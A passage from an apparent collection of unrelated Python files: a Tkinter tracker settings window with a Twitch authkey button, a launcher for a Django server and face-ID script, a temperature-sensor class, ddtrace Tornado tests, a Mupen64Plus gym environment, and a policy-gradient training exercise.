c = Checkbutton(tournament_settings_frame, text=self.pretty_name(
opt), variable=self.checks[opt], indicatoron=False)
c.grid(row=next_row, column=0, pady=2)
c.configure(command=self.checkbox_callback)
if getattr(self.options, opt, False):
c.select()
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["trackerserver_url"]):
self.labels[opt] = Label(
tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = Entry(tournament_settings_frame)
self.entries[opt].grid(row=next_row, column=1, pady=2)
self.entries[opt].insert(0, getattr(self.options, opt, ""))
next_row += 1
paddings = {"read_from_server": 5, "write_to_server": 120}
callbacks = {"read_from_server": self.read_callback,
"write_to_server": self.write_callback}
for index, opt in enumerate(["read_from_server", "write_to_server"]):
self.checks[opt] = IntVar()
c = Checkbutton(tournament_settings_frame, text=self.pretty_name(
opt), variable=self.checks[opt], indicatoron=False)
c.grid(row=next_row, column=index, pady=2, padx=paddings[opt])
c.configure(command=callbacks[opt])
if getattr(self.options, opt, False):
c.select()
next_row += 1
for index, opt in enumerate(["server_connect_label"]):
self.labels[opt] = Label(self.root, text="", width=len(
self.connection_labels["fail"]))
self.labels[opt].grid(row=next_row, pady=2,
columnspan=2, in_=tournament_settings_frame)
next_row += 1
for index, opt in enumerate(["twitch_name"]):
self.labels[opt] = Label(
tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = ttk.Combobox(
tournament_settings_frame, width=40)
self.entries[opt].set(getattr(self.options, opt, ""))
self.entries[opt].bind("<<ComboboxSelected>>", self.trim_name)
self.entries[opt].grid(row=next_row, column=1)
next_row += 1
# Generate text options by looping over option types
for index, opt in enumerate(["read_delay", "trackerserver_authkey"]):
self.labels[opt] = Label(
tournament_settings_frame, text=self.pretty_name(opt))
self.labels[opt].grid(row=next_row, pady=2)
self.entries[opt] = Entry(tournament_settings_frame)
self.entries[opt].grid(row=next_row, column=1, pady=2)
self.entries[opt].insert(0, getattr(self.options, opt, ""))
next_row += 1
def authkey_fn():
self.entries["trackerserver_authkey"].delete(0, last=END)
twitch_client_id = self.get_server_twitch_client_id()
if twitch_client_id is not None:
webbrowser.open("https://api.twitch.tv/kraken/oauth2/authorize?response_type=token&client_id=" + twitch_client_id + "&redirect_uri=" +
self.entries['trackerserver_url'].get() + "/tracker/setup&scope=", autoraise=True)
else:
# TODO: show an error
pass
self.buttons["authkey_button"] = Button(
tournament_settings_frame,
text="Get an authkey",
command=authkey_fn
)
self.buttons["authkey_button"].grid(row=next_row, column=1, pady=5)
# Check for coherency in options with priority to read
self.read_callback()
# Disable some textboxes if needed
self.checkbox_callback()
buttonframe = LabelFrame(self.root, bd=0, padx=5, pady=5)
buttonframe.grid(row=2, column=1)
# Save and cancel buttons
save = Button(
buttonframe,
text="Save",
command=self.save_callback
)
save.grid(row=0, column=0, padx=5)
cancel = Button(
buttonframe,
text="Cancel",
command=self.root.destroy
)
cancel.grid(row=0, column=1, padx=5)
# We're going to jump through a lot of hoops so we can position the options window on top of the tracker...
# ... WITHOUT going off the edge of the screen
# First we start out placing ourselves at the tracker's position
x_pos = getattr(self.options, "x_position")
y_pos = getattr(self.options, "y_position")
# Now we make ourselves invisible and fullscreen (this is a hack to measure the size and position of the monitor)
# We can't use the "screenwidth" and "screenheight" functions because they only give info on the primary display!
self.root.geometry('+%d+%d' % (x_pos, y_pos))
self.root.attributes("-alpha", 00)
if platform.system() == "Windows":
self.root.state("zoomed")
self.root.update()
else:
if platform.system() != "Darwin":
# todo: figure out how to do this on mac. Right now this hacky logic to avoid going
# off the edge of the screen is doing who-knows-what when run on a mac.
self.root.attributes("-fullscreen", True)
# For some reason using 'update' here affects the actual window height we want to get later
self.root.update_idletasks()
# Our current width and height are now our display's width and height
screen_width = self.root.winfo_width()
screen_height = self.root.winfo_height()
# Get the upper left corner of the monitor
origin_x = self.root.winfo_x()
origin_y = self.root.winfo_y()
# Now we get out of invisible fullscreen mode
self.root.attributes("-alpha", 0xFF)
if platform.system() == "Windows":
self.root.state("normal")
else:
if platform.system() != "Darwin":
# todo: figure out how to do this on mac
self.root.attributes("-fullscreen", False)
self.root.update()
# Here's the actual size of the window we're drawing
window_width = self.root.winfo_width()
window_height = self.root.winfo_height()
# Now we can make sure we don't go off the sides
max_x = origin_x + screen_width - window_width - 50
max_y = origin_y + screen_height - window_height - 50
x_pos = min(x_pos, max_x)
y_pos = min(y_pos, max_y)
# Clamp origin after clamping the other side, so that if our window is too big we lose the bottom/right instead of top/left
x_pos = max(x_pos, origin_x)
y_pos = max(y_pos, origin_y)
self.root.geometry('+%d+%d' % (x_pos, y_pos))
self.root.update()
self.root.focus_force()
# We're polling this queue for network results 10 times per second. This avoids blocking the main thread when we talk to the server
self.root.after(100, self.process_network_results)
# Start the main loop
mainloop()
|
launch.py
|
# multiprocess server and faceID
import multiprocessing
import time
import os
def faceRecog():
os.system("cd $GGPATH/FaceID && python3 -c 'from faceID import *; main()'")
def server():
os.system("cd $GGPATH/GGProject && python3 $GGPATH/GGProject/manage.py runserver")
if __name__ == '__main__':
proc1 = multiprocessing.Process(target=server)
proc2 = multiprocessing.Process(target=faceRecog)
proc1.start()
time.sleep(5)
proc2.start()
|
temp_sensor.py
|
try:
from w1thermsensor import W1ThermSensor
except Exception as e:
print("W1thermsensor not installed. Ok if using sim-mode")
import threading
from time import sleep
class Sensor:
def __init__(self, read_interval):
self.thread = threading.Thread(target=self._read_temp_thread)
self.read_interval = read_interval
self.sensor = W1ThermSensor()
self.temperature = self.sensor.get_temperature()
self.thread.start()
def temp(self):
return self.temperature
def _read_temp_thread(self):
while True:
self.temperature = self.sensor.get_temperature()
sleep(self.read_interval)
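# Usage sketch (assumes a 1-wire sensor such as a DS18B20 is wired up for
# w1thermsensor):
#     sensor = Sensor(read_interval=5)   # background thread re-reads every 5 s
#     current_temp = sensor.temp()       # most recently read temperature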
|
test_safety.py
|
import threading
from nose.tools import eq_
from tornado import httpclient
from tornado.testing import gen_test
from ddtrace.contrib.tornado import patch, unpatch
from . import web
from .web.app import CustomDefaultHandler
from .utils import TornadoTestCase
class TestAsyncConcurrency(TornadoTestCase):
"""
Ensure that application instrumentation doesn't break asynchronous concurrency.
"""
@gen_test
def test_concurrent_requests(self):
# the application must handle concurrent calls
def make_requests():
# use a blocking HTTP client (we're in another thread)
http_client = httpclient.HTTPClient()
url = self.get_url('/nested/')
response = http_client.fetch(url)
eq_(200, response.code)
eq_('OK', response.body.decode('utf-8'))
# freeing file descriptors
http_client.close()
# blocking call executed in different threads
threads = [threading.Thread(target=make_requests) for _ in range(25)]
for t in threads:
t.daemon = True
t.start()
# wait for the requests to finish; this sleep effectively serves as the timeout
yield web.compat.sleep(0.5)
# the trace is created
traces = self.tracer.writer.pop_traces()
eq_(25, len(traces))
eq_(2, len(traces[0]))
class TestAppSafety(TornadoTestCase):
"""
Ensure that the application patch has the proper safety guards.
"""
def test_trace_unpatch(self):
# the application must not be traced if unpatch() is called
patch()
unpatch()
response = self.fetch('/success/')
eq_(200, response.code)
traces = self.tracer.writer.pop_traces()
eq_(0, len(traces))
def test_trace_unpatch_not_traced(self):
# the untrace must be safe if the app is not traced
unpatch()
unpatch()
response = self.fetch('/success/')
eq_(200, response.code)
traces = self.tracer.writer.pop_traces()
eq_(0, len(traces))
def test_trace_app_twice(self):
# the application must not be traced multiple times
patch()
patch()
response = self.fetch('/success/')
eq_(200, response.code)
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(1, len(traces[0]))
def test_arbitrary_resource_querystring(self):
# user input should not determine the `span.resource` field
response = self.fetch('/success/?magic_number=42')
eq_(200, response.code)
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(1, len(traces[0]))
request_span = traces[0][0]
eq_('tests.contrib.tornado.web.app.SuccessHandler', request_span.resource)
eq_('/success/?magic_number=42', request_span.get_tag('http.url'))
def test_arbitrary_resource_404(self):
# user input should not determine the `span.resource` field
response = self.fetch('/does_not_exist/')
eq_(404, response.code)
traces = self.tracer.writer.pop_traces()
eq_(1, len(traces))
eq_(1, len(traces[0]))
request_span = traces[0][0]
eq_('tornado.web.ErrorHandler', request_span.resource)
eq_('/does_not_exist/', request_span.get_tag('http.url'))
class TestCustomAppSafety(TornadoTestCase):
"""
Ensure that the application patch has the proper safety guards,
even for custom default handlers.
"""
def get_settings(self):
return {
'default_handler_class': CustomDefaultHandler,
'default_handler_args': dict(status_code=400),
}
def test_trace_unpatch(self):
# the application must not be traced if unpatch() is called
unpatch()
response = self.fetch('/custom_handler/')
eq_(400, response.code)
traces = self.tracer.writer.pop_traces()
eq_(0, len(traces))
|
mupen64plus_env.py
|
import sys
PY3_OR_LATER = sys.version_info[0] >= 3
if PY3_OR_LATER:
# Python 3 specific definitions
from http.server import BaseHTTPRequestHandler, HTTPServer
else:
# Python 2 specific definitions
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import abc
import array
from contextlib import contextmanager
import inspect
import itertools
import json
import os
import subprocess
import threading
import time
from termcolor import cprint
import yaml
import gym
from gym import error, spaces, utils
from gym.utils import seeding
import numpy as np
import mss
###############################################
class ImageHelper:
def GetPixelColor(self, image_array, x, y):
base_pixel = image_array[y][x]
red = base_pixel[0]
green = base_pixel[1]
blue = base_pixel[2]
return (red, green, blue)
###############################################
### Variables & Constants ###
###############################################
# The width, height, and depth of the emulator window:
SCR_W = 640
SCR_H = 480
SCR_D = 3
MILLISECOND = 1.0 / 1000.0
IMAGE_HELPER = ImageHelper()
###############################################
class Mupen64PlusEnv(gym.Env):
__metaclass__ = abc.ABCMeta
metadata = {'render.modes': ['human']}
def __init__(self):
self.viewer = None
self.reset_count = 0
self.step_count = 0
self.running = True
self.mss_grabber = None
self.episode_over = False
self.pixel_array = None
self._base_load_config()
self._base_validate_config()
self.frame_skip = self.config['FRAME_SKIP']
if self.frame_skip < 1:
self.frame_skip = 1
self.controller_server, self.controller_server_thread = self._start_controller_server()
self.xvfb_process, self.emulator_process = \
self._start_emulator(rom_name=self.config['ROM_NAME'],
gfx_plugin=self.config['GFX_PLUGIN'],
input_driver_path=self.config['INPUT_DRIVER_PATH'])
with self.controller_server.frame_skip_disabled():
self._navigate_menu()
self.observation_space = \
spaces.Box(low=0, high=255, shape=(SCR_H, SCR_W, SCR_D))
self.action_space = spaces.MultiDiscrete([[-80, 80], # Joystick X-axis
[-80, 80], # Joystick Y-axis
[ 0, 1], # A Button
[ 0, 1], # B Button
[ 0, 1], # RB Button
[ 0, 1], # LB Button
[ 0, 1], # Z Button
[ 0, 1], # C Right Button
[ 0, 1], # C Left Button
[ 0, 1], # C Down Button
[ 0, 1], # C Up Button
[ 0, 1], # D-Pad Right Button
[ 0, 1], # D-Pad Left Button
[ 0, 1], # D-Pad Down Button
[ 0, 1], # D-Pad Up Button
[ 0, 1], # Start Button
])
def _base_load_config(self):
self.config = yaml.safe_load(open(os.path.join(os.path.dirname(inspect.stack()[0][1]), "config.yml")))
self._load_config()
@abc.abstractmethod
def _load_config(self):
return
def _base_validate_config(self):
if 'ROM_NAME' not in self.config:
raise AssertionError('ROM_NAME configuration is required')
if 'GFX_PLUGIN' not in self.config:
raise AssertionError('GFX_PLUGIN configuration is required')
self._validate_config()
@abc.abstractmethod
def _validate_config(self):
return
def _step(self, action):
#cprint('Step %i: %s' % (self.step_count, action), 'green')
self._act(action)
obs = self._observe()
self.episode_over = self._evaluate_end_state()
reward = self._get_reward()
self.step_count += 1
return obs, reward, self.episode_over, {}
def _act(self, action, count=1):
for _ in itertools.repeat(None, count):
self.controller_server.send_controls(ControllerState(action))
def _wait(self, count=1, wait_for='Unknown'):
self._act(ControllerState.NO_OP, count=count)
def _press_button(self, button, times=1):
for _ in itertools.repeat(None, times):
self._act(button) # Press
self._act(ControllerState.NO_OP) # and release
def _observe(self):
#cprint('Observe called!', 'yellow')
if self.config['USE_XVFB']:
offset_x = 0
offset_y = 0
else:
offset_x = self.config['OFFSET_X']
offset_y = self.config['OFFSET_Y']
image_array = \
np.array(self.mss_grabber.grab({"top": offset_y,
"left": offset_x,
"width": SCR_W,
"height": SCR_H}),
dtype=np.uint8)
# drop the alpha channel and flip red and blue channels (BGRA -> RGB)
self.pixel_array = np.flip(image_array[:, :, :3], 2)
return self.pixel_array
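# Note on _observe(): mss grabs pixels in BGRA order, so an illustrative pixel
# [b, g, r, a] = [10, 20, 30, 255] becomes [30, 20, 10] after dropping the
# alpha channel and flipping axis 2 above.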
@abc.abstractmethod
def _navigate_menu(self):
return
@abc.abstractmethod
def _get_reward(self):
#cprint('Get Reward called!', 'yellow')
return 0
@abc.abstractmethod
def _evaluate_end_state(self):
#cprint('Evaluate End State called!', 'yellow')
return False
@abc.abstractmethod
def _reset(self):
cprint('Reset called!', 'yellow')
self.reset_count += 1
self.step_count = 0
return self._observe()
def _render(self, mode='human', close=False):
if close:
if hasattr(self, 'viewer') and self.viewer is not None:
self.viewer.close()
self.viewer = None
return
img = self.pixel_array
if mode == 'rgb_array':
return img
elif mode == 'human':
if not hasattr(self, 'viewer') or self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
self.viewer.imshow(img)
def _close(self):
cprint('Close called!', 'yellow')
self.running = False
self._kill_emulator()
self._stop_controller_server()
def _start_controller_server(self):
server = ControllerHTTPServer(server_address = ('', self.config['PORT_NUMBER']),
control_timeout = self.config['ACTION_TIMEOUT'],
frame_skip = self.frame_skip) # TODO: Environment argument (with issue #26)
server_thread = threading.Thread(target=server.serve_forever, args=())
server_thread.daemon = True
server_thread.start()
print('ControllerHTTPServer started on port ', self.config['PORT_NUMBER'])
return server, server_thread
def _stop_controller_server(self):
#cprint('Stop Controller Server called!', 'yellow')
if hasattr(self, 'controller_server'):
self.controller_server.shutdown()
def _start_emulator(self,
rom_name,
gfx_plugin,
input_driver_path,
res_w=SCR_W,
res_h=SCR_H,
res_d=SCR_D):
rom_path = os.path.abspath(
os.path.join(os.path.dirname(inspect.stack()[0][1]),
'../ROMs',
rom_name))
if not os.path.isfile(rom_path):
msg = "ROM not found: " + rom_path
cprint(msg, 'red')
raise Exception(msg)
input_driver_path = os.path.abspath(os.path.expanduser(input_driver_path))
if not os.path.isfile(input_driver_path):
msg = "Input driver not found: " + input_driver_path
cprint(msg, 'red')
raise Exception(msg)
cmd = [self.config['MUPEN_CMD'],
"--nospeedlimit",
"--nosaveoptions",
"--resolution",
"%ix%i" % (res_w, res_h),
"--gfx", gfx_plugin,
"--audio", "dummy",
"--input", input_driver_path,
rom_path]
initial_disp = os.environ["DISPLAY"]
cprint('Initially on DISPLAY %s' % initial_disp, 'red')
xvfb_proc = None
if self.config['USE_XVFB']:
display_num = -1
success = False
# Try display numbers :0 through :15; give up if none of them is free
while not success and display_num <= 15:
display_num += 1
xvfb_cmd = [self.config['XVFB_CMD'],
":" + str(display_num),
"-screen",
"0",
"%ix%ix%i" % (res_w, res_h, res_d * 8),
"-fbdir",
self.config['TMP_DIR']]
cprint('Starting xvfb with command: %s' % xvfb_cmd, 'yellow')
xvfb_proc = subprocess.Popen(xvfb_cmd, shell=False, stderr=subprocess.STDOUT)
time.sleep(2) # Give xvfb a couple seconds to start up
# Poll the process to see if it exited early
# (most likely due to a server already active on the display_num)
if xvfb_proc.poll() is None:
success = True
print('')
if not success:
msg = "Failed to initialize Xvfb!"
cprint(msg, 'red')
raise Exception(msg)
os.environ["DISPLAY"] = ":" + str(display_num)
cprint('Using DISPLAY %s' % os.environ["DISPLAY"], 'blue')
cprint('Changed to DISPLAY %s' % os.environ["DISPLAY"], 'red')
cmd = [self.config['VGLRUN_CMD'], "-d", ":" + str(display_num)] + cmd
cprint('Starting emulator with command: %s' % cmd, 'yellow')
emulator_process = subprocess.Popen(cmd,
env=os.environ.copy(),
shell=False,
stderr=subprocess.STDOUT)
# TODO: Test and cleanup:
# May need to initialize this after the DISPLAY env var has been set
# so it attaches to the correct X display; otherwise screenshots may
# come from the wrong place. This used to be true when we were using
# wxPython for screenshots. Untested after switching to mss.
cprint('Calling mss.mss() with DISPLAY %s' % os.environ["DISPLAY"], 'red')
self.mss_grabber = mss.mss()
time.sleep(2) # Give mss a couple seconds to initialize; also may not be necessary
# Restore the DISPLAY env var
os.environ["DISPLAY"] = initial_disp
cprint('Changed back to DISPLAY %s' % os.environ["DISPLAY"], 'red')
emu_mon = EmulatorMonitor()
monitor_thread = threading.Thread(target=emu_mon.monitor_emulator,
args=[emulator_process])
monitor_thread.daemon = True
monitor_thread.start()
return xvfb_proc, emulator_process
def _kill_emulator(self):
#cprint('Kill Emulator called!', 'yellow')
try:
self._act(ControllerState.NO_OP)
if self.emulator_process is not None:
self.emulator_process.kill()
if self.xvfb_process is not None:
self.xvfb_process.terminate()
except AttributeError:
pass # We may be shut down during initialization before these attributes have been set
###############################################
class EmulatorMonitor:
def monitor_emulator(self, emulator):
emu_return = emulator.poll()
while emu_return is None:
time.sleep(2)
if emulator is not None:
emu_return = emulator.poll()
else:
print('Emulator reference is no longer valid. Shutting down?')
return
# TODO: this means our environment died... need to die too
print('Emulator closed with code: ' + str(emu_return))
###############################################
class ControllerState(object):
# Controls [ JX, JY, A, B, RB, LB, Z, CR, CL, CD, CU, DR, DL, DD, DU, S]
NO_OP = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
START_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
A_BUTTON = [ 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
B_BUTTON = [ 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
RB_BUTTON = [ 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
CR_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
CL_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
CD_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]
CU_BUTTON = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
JOYSTICK_UP = [ 0, 127, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
JOYSTICK_DOWN = [ 0, -128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
JOYSTICK_LEFT = [-128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
JOYSTICK_RIGHT = [ 127, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
def __init__(self, controls=NO_OP):
self.X_AXIS = controls[0]
self.Y_AXIS = controls[1]
self.A_BUTTON = controls[2]
self.B_BUTTON = controls[3]
self.R_TRIG = controls[4]
self.L_TRIG = controls[5]
self.Z_TRIG = controls[6]
self.R_CBUTTON = controls[7]
self.L_CBUTTON = controls[8]
self.D_CBUTTON = controls[9]
self.U_CBUTTON = controls[10]
self.R_DPAD = controls[11]
self.L_DPAD = controls[12]
self.D_DPAD = controls[13]
self.U_DPAD = controls[14]
self.START_BUTTON = controls[15]
def to_json(self):
return json.dumps(self.__dict__)
###############################################
class ControllerHTTPServer(HTTPServer, object):
def __init__(self, server_address, control_timeout, frame_skip):
self.control_timeout = control_timeout
self.controls = ControllerState()
self.hold_response = True
self.running = True
self.send_count = 0
self.frame_skip = frame_skip
self.frame_skip_enabled = True
self.TEXT_PLAIN_CONTENT_TYPE = "text/plain".encode()
super(ControllerHTTPServer, self).__init__(server_address, self.ControllerRequestHandler)
def send_controls(self, controls):
#print('Send controls called')
self.send_count = 0
self.controls = controls
self.hold_response = False
# Wait for controls to be sent:
#start = time.time()
while not self.hold_response: # and time.time() < start + self.control_timeout:
time.sleep(MILLISECOND)
def shutdown(self):
self.running = False
super(ControllerHTTPServer, self).shutdown()
super(ControllerHTTPServer, self).server_close()
# http://preshing.com/20110920/the-python-with-statement-by-example/#implementing-the-context-manager-as-a-generator
@contextmanager
def frame_skip_disabled(self):
self.frame_skip_enabled = False
yield True
self.frame_skip_enabled = True
class ControllerRequestHandler(BaseHTTPRequestHandler, object):
def log_message(self, fmt, *args):
pass
def write_response(self, resp_code, resp_data):
self.send_response(resp_code)
self.send_header("Content-type", self.server.TEXT_PLAIN_CONTENT_TYPE)
self.end_headers()
self.wfile.write(resp_data.encode())
def do_GET(self):
while self.server.running and self.server.hold_response:
time.sleep(MILLISECOND)
if not self.server.running:
print('Sending SHUTDOWN response')
# TODO: This sometimes fails with a broken pipe because
# the emulator has already stopped. Should handle gracefully (Issue #4)
self.write_response(500, "SHUTDOWN")
return
### respond with controller output
self.write_response(200, self.server.controls.to_json())
self.server.send_count += 1
# If we have sent the controls 'n' times, now we block until the next action is sent
if self.server.send_count >= self.server.frame_skip or not self.server.frame_skip_enabled:
self.server.hold_response = True
return
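# Handshake implemented above: send_controls() publishes a new ControllerState
# and clears hold_response; each emulator poll then receives that state from
# do_GET until it has been served frame_skip times (or once, when frame
# skipping is disabled), after which hold_response is set again and
# send_controls() returns.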
###############################################
|
train_pg.py
|
import numpy as np
import tensorflow as tf
import gym
import roboschool
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
def normalize(data, mean=0.0, std=1.0):
n_data = (data - np.mean(data)) / (np.std(data) + 1e-8)
return n_data * (std + 1e-8) + mean
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None
):
#========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
#========================================================================================#
with tf.variable_scope(scope):
# YOUR_CODE_HERE
out = input_placeholder
for l in range(n_layers):
out = tf.layers.dense(inputs=out, units=size, activation=activation)
out = tf.layers.dense(inputs=out, units=output_size, activation=output_activation)
return out
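# For example, build_mlp(sy_ob_no, output_size=ac_dim, scope="policy",
# n_layers=2, size=64) maps a [batch, ob_dim] placeholder to a [batch, ac_dim]
# tensor: two 64-unit tanh hidden layers followed by a linear output layer
# (output_activation=None).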
def pathlength(path):
return len(path["reward"])
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
gae_lambda=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
# Observations are input for everything: sampling actions, baselines, policy gradients
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
# Actions are input when computing policy gradient updates
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Advantages are input when computing policy gradient updates
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
# YOUR_CODE_HERE
# Compute stochastic policy over discrete actions
sy_logits_na = build_mlp(sy_ob_no, ac_dim, "policy", n_layers=n_layers, size=size)
# Sample an action from the stochastic policy
sy_sampled_ac = tf.reshape(tf.multinomial(sy_logits_na, 1), [-1]) # tf.multinomial draws samples from a multinomial distribution
# Likelihood of chosen action
sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
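# (sparse_softmax_cross_entropy_with_logits returns -log softmax(logits)[action],
# so negating it gives exactly log pi(a|s) for the chosen action.)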
else:
# YOUR_CODE_HERE
# Compute Gaussian stochastic policy over continuous actions.
# The mean is a function of observations, while the variance is not.
sy_mean = build_mlp(sy_ob_no, ac_dim, "policy", n_layers=n_layers, size=size)
sy_logstd = tf.Variable(tf.zeros([1, ac_dim]), name="policy/logstd", dtype=tf.float32)
sy_std = tf.exp(sy_logstd)
# Sample an action from the stochastic policy
sy_sampled_z = tf.random_normal(tf.shape(sy_mean)) # tf.random_normal outputs random values from a normal distribution
sy_sampled_ac = sy_mean + sy_std * sy_sampled_z
# Likelihood of chosen action
sy_z = (sy_ac_na - sy_mean) / sy_std
sy_logprob_n = -0.5 * tf.reduce_sum(tf.square(sy_z), axis=1)
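# The full Gaussian log-density is
#     log pi(a|s) = -0.5 * sum_i z_i**2 - sum_i log(sigma_i) - (ac_dim / 2) * log(2 * pi)
# with z_i = (a_i - mu_i) / sigma_i; the code above keeps only the quadratic
# term, since the remaining terms do not depend on the sampled action.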
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
# Loss function that we'll differentiate to get the policy gradient.
# Note: no gradient will flow through sy_adv_n, because it's a placeholder.
loss = -tf.reduce_mean(sy_logprob_n * sy_adv_n)
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
#========================================================================================#
# ----------SECTION 5----------
# Optional Baseline
#========================================================================================#
if nn_baseline:
baseline_prediction = tf.squeeze(build_mlp(sy_ob_no, 1, "nn_baseline", n_layers=n_layers, size=size))
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
# YOUR_CODE_HERE
sy_target_n = tf.placeholder(shape=[None], name="target", dtype=tf.float32)
baseline_loss = tf.nn.l2_loss(baseline_prediction - sy_target_n)
baseline_update_op = tf.train.AdamOptimizer(learning_rate).minimize(baseline_loss)
#========================================================================================#
# Tensorflow Engineering: Config, Session, Variable initialization
#========================================================================================#
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
sess = tf.Session(config=tf_config)
sess.__enter__() # equivalent to `with sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
# Simulate one episode and get a path
ob = env.reset()
obs, acs, rews = [], [], []
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and animate)
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.05)
obs.append(ob)
# Feed a batch of one observation to get a batch of one action
ac = sess.run(sy_sampled_ac, feed_dict={sy_ob_no : [ob]})
ac = ac[0]
acs.append(ac)
# Simulate one time step
ob, rew, done, _ = env.step(ac)
rews.append(rew)
steps += 1
if done or steps > max_path_length:
break
path = {"observation" : np.array(obs),
"action" : np.array(acs),
"reward" : np.array(rews)}
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > min_timesteps_per_batch:
break
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
#====================================================================================#
# ----------SECTION 4----------
# Computing Q-values
#
# Your code should construct numpy arrays for Q-values which will be used to compute
# advantages (which will in turn be fed to the placeholder you defined above).
#
# Recall that the expression for the policy gradient PG is
#
# PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t)]
#
# where
#
# tau=(s_0, a_0, ...) is a trajectory,
# Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
# and b_t is a baseline which may depend on s_t.
#
